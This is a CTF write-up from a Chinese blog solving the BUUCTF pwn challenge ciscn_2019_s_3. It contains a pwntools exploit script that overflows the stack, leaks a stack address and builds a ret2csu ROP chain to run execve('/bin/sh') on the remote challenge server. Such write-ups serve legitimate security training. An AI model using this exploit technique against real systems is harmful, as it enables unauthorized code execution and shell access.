buuctf|ciscn_2019_s_3 1

最新推荐文章于 2024-06-11 17:37:07 发布
最新推荐文章于 2024-06-11 17:37:07 发布
阅读量304 收藏 2
点赞数
分类专栏: buuctf pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64236521/article/details/124903969
版权
buuctf 同时被 2 个专栏收录
10 篇文章 1 订阅
订阅专栏
pwn
6 篇文章 1 订阅
订阅专栏

buuctf|ciscn_2019_s_3 1

如下图在这里插入图片描述
明显的栈溢出
在这里插入图片描述
这里调用了系统号为0x3B(十进制为59)的函数,查下表
在这里插入图片描述
是exeve(‘/bin/sh’,0,0),为了控制寄存器使其第一个参数为/bin/sh,其余为0,需要用到csu控制寄存器
在这里插入图片描述
exp如下

from pwn import*
#p=process('./pwn_30')
p=remote('node4.buuoj.cn',27704)
pop_bx_bp_12_13_14_15=0x40059A
csu_2=0x400580
syscall=0x400517
eve=0x4004e2
poprdi=0x00000000004005a3
main=0x4004ed

payload1=b'/bin/sh\00'*2+p64(main)
p.sendline(payload1)
p.recv(0x20)
sh=u64(p.recv(8))-280
                                                                                              #sh+0x50                  
payload2=b'/bin/sh\00'*2+p64(pop_bx_bp_12_13_14_15)+p64(0)*2+p64(sh+0x50)+p64(0)*3+p64(csu_2)+p64(eve)+p64(poprdi)+p64(sh)+p64(syscall)
p.send(payload2)
p.interactive()
嚚_瘖
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 461
ciscn_2019_s_3
2019ciscn_s_3
Hyrink的博客
06-07 431
ciscn_s_3的两种解法:SROP & ret2csu详解
ciscn_2019_s_3
qq_45691294的博客
12-29 2126
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 693
打开函数只有read和write。发现gadget函数,这道题重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
Ret2csu level5 & ciscn_2019_s_3
红叶的博客
11-06 403
本题难点:对栈的理解需要稍微更深入一点。
[BUUCTF]PWN21——ciscn_2019_s_3
mcmuyanga的博客
09-07 1400
[BUUCTF]PWN21——ciscn_2019_s_3 附件 步骤 例行检查,64位,开启了NX保护 试运行的时候回显是一些乱码,直接用ida打开,从main函数开始看 main函数调用了vuln函数 __asm 关键字用于调用内联汇编程序,并且可在 C 或 C++ 语句合法时出现。 我们首先要了解一下64位系统的系统调用 传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号 为 0 ;
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 504
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1540
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】web之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 346
64位,开启了NX保护 main函数调用了vuln
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1315
这题对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
BUUCTF - PWN】ciscn_2019_s_3
古月浪子的博客
04-17 737
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...
BUUCTF ciscn_2019_s_3 对于零基础小白很烧脑的一道入门题
weixin_44447516的博客
08-25 236
pwn buuctf ciscn_2019_s_3 入门
BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
m0_55368674的博客
02-18 460
BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
数字时代网络安全即服务的兴起
最新发布
网络研究观
06-11 572
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
buuctf re luky_guy
09-27
buuctf re是一个缩写,表示buuctf关于luky_guy的回答。根据提供的引用内容,Luky库是一组抽象复杂操作的Java类,包括用于网络、事件处理、加密、数据库处理、snmp监视、队列、信号量、解析器、XML处理程序等的类。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值